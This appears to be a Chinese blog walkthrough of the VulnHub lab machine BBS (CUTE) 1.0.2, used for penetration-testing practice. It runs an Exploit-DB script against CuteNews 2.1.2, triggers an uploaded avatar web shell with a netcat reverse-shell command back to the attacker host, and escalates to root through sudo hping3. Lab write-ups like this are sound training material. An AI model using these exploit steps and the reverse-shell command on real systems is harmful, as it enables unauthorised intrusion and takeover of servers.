BBS (CUTE): 1.0.2

BBS (CUTE): 1.0.2 https://www.vulnhub.com/entry/bbs-cute-102,567/

靶场配置网络

登陆时按e 修改rw signie init=/bin/bash 按Ctrl+x 进入 root@(none) 模式

ip add 看到网卡名字叫做ens33

需要修改网卡配置文件

vi /etc/network/interfaces

allow-hotplug ens33

iface ens33 1inet dhcp

重启获得IP地址

使用目录扫描,获得

http://192.168.204.134/index.php

留意到版本号CuteNews 2.1.2

在kali上操作

searchsploit cutenews 2.1.2 看到路径

cp /usr/share/exploitdb/exploits/php/webapps/48800.py ./

修改py配置文件,将所有的/CuteNews删除

执行命令python3 48800.py

输入http://192.168.204.134获得账号名密码

登录BBS (CUTE): 1.0.2,找到注入点

http://192.168.204.134/uploads/avatar_vDnS6Pt85h_vDnS6Pt85h.php?cmd=nc -e /bin/bash 192.168.204.135 1234

在kali上连接 nc -lvvp 1234 (从KALI输入访问靶机)

python -c 'import pty;pty.spawn("/bin/bash")'

-c : 执行具体的代码

import :导入语句

pty : 终端(接口)

pty.spawn : 执行命令

export TERM=screen

stty rows 45 columns 194 (参考stty -a)

reset

通过sudo -l 查看权限

/usr/sbin/hping3 获得root权限

find / -name /root/root.txt

相关推荐
三七吃山漆8 小时前
BUUCTF-[BJDCTF2020]Mark loves cat
web安全·网络安全·buuctf
网络安全许木9 小时前
自学渗透测试第13天(DVWA配置与信息收集命令)
网络安全·渗透测试·信息收集·kali linux
计算机毕业设计指导10 小时前
基于机器学习和深度学习的恶意WebURL检测系统实战详解
人工智能·深度学习·机器学习·网络安全
兄弟加油,别颓废了。11 小时前
ctf.show_web5
网络安全
一名优秀的码农11 小时前
vulhub系列-62-dcoffeaddicts(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
JS_SWKJ11 小时前
让数据“安全过河”:网闸如何守护政务交换的最后一道防线?
网络安全
芯盾时代11 小时前
政务外网终端“一机两用”安全管控解决方案
安全·网络安全·政务·终端安全
pencek11 小时前
HackMyVM-Whitedoor
网络安全
网络安全许木12 小时前
自学渗透测试的第十天(HTTP进阶与Burp Suite基础)
网络·网络协议·http·网络安全·渗透测试
pencek12 小时前
HakcMyVM-VivifyTech
网络安全